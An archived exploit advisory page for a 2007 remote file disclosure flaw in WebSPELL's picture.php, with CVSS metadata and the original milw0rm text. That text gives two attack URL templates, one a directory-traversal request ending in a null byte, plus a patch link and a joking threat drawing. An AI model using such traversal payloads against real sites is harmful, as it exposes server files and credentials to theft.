header-logo
Suggest Exploit
vendor:
by:
Trex
7.5
CVSS
HIGH
Remote File Disclosure
CWE
Product Name:
Affected Version From: WebSPELL <= 4.01.02
Affected Version To:
Patch Exists: YES
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability

This vulnerability allows an attacker to remotely disclose files on the target system. It works independently from PHP version but depends on PHP option register_globals (= on) or PHP versions (< 4.3.0). The exploit can be triggered by accessing the picture.php file with specific parameters.

Mitigation:

The recommended solution to this vulnerability is to apply the patch provided at http://fixes.trex-online.net/picture.rar.
Source

Exploit-DB raw data:

# WebSPELL <= 4.01.02 (picture.php) Remote File Disclosure Vulnerability
# Discovered by: Trex
# Visit: www.Trex-Online.net / www.UnderGround.ag
# Comment: Happy easter!
#
#   ___     ___
#  /   \   /   \       ___________________________
# /   / \_/ \   \     /                           \
# \__/\     /\__/    /  GIVE ME A CARROT OR I WILL \
#      \O O/         \      BLOW UP YOUR HOUSE     /
#   ___/ ^ \___      / ___________________________/
#      \___/        /_/
#      _/ \_
#   __//   \\__
#  /___\/_\/___\
#
#
#
# Vulnerability 1:
# Advantage: works independently from PHP version.
# Disadvantage: works dependently from PHP option register_globals (= on).
#
# http://[SITE][PAHT]/picture.php?file=[FILE]
#
#
#
# Vulnerability 2:
# Advantage: works independently from PHP option register_globals.
# Disadvantage: works dependently from PHP versions (< 4.3.0).
#
# http://[SITE][PAHT]/picture.php?id=../../../[FILE]%00
#
#
#
# Solution:
# http://fixes.trex-online.net/picture.rar

# milw0rm.com [2007-04-05]
cqrsecured